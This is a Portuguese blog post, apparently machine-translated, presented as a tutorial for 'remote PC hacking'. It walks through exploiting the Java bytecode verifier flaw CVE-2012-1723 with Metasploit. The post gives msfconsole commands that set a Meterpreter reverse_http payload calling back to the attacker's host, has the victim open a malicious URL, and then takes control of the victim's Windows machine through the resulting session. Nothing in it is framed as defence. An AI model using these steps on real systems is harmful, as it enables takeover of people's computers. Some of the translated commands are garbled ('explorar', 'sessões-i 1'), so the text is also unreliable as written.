terça-feira, 15 de janeiro de 2013

PC remoto Hacking, explorando Applet Java Bytecode Campo de Execução Remota de Código Verificador Cache

CVE-2012-1723: Esta é uma vulnerabilidade no verificador de bytecode HotSpot onde uma otimização inválido de GetField / PUTFIELD / instruções GETSTATIC / PUTSTATIC leva a verificação de tipo insuficiente. Um arquivo de classe especialmente criada poderia usar esta falha para contornar as restrições de Java sandbox, e carregar classes adicionais a fim de realizar operações maliciosas. A vulnerabilidade foi tornada pública por Schierl 'mihi' Michael.

Requisito:
  • Máquina atacante: Backtrack
  • Máquina da vítima: Windows (instalação JRE versão sem patch)
Passo 1: Inicie o console Metasploit
Abra o Terminal na Máquina atacante (Backtrack).
Digite "msfupdate", isso irá atualizar o metasploit com os últimos módulos.
Agora digite "msfconsole" para obter a interação com a estrutura Metasploit.

Etapa 2:
Tipo "use exploit / multi / browser / java_verifier_field_access" e siga os comandos abaixo:


msf exploit (java_verifier_field_access)> set PAYLOAD java / Meterpreter / reverse_http
msf exploit (java_verifier_field_access)> set LHOST [ENDEREÇO ​​Backtrack IP]
msf exploit (java_verifier_field_access)> explorar

Se você não sabe o que eu estou falando, por favor leia o meu tutorial anterior .

Etapa 3:
Se você seguir os comandos acima corretamente, você terá o seguinte resultado.

Copie o url e abrir o link na máquina da vítima. Uma vez que a url carregado na máquina da vítima, que vai lançar o exploit e cria uma nova sessão.

Agora digite "sessões", isto irá mostrar a lista de sessões ativas.

Tipo "sessões-i 1", isto irá abrir a conexão com a sessão com o '1 id 'e trazê-lo para Meterpreter. Meterpreter vai ajudar você a interagir / controlar o destino.


Fonte: Brek the Security 


ate Mais... 
← Postagem mais recente Postagem mais antiga → Página inicial

0 comentários:

Postar um comentário

Copyright © Hacking & Security | Powered by Xandao Design by Xandao86 | Xandao86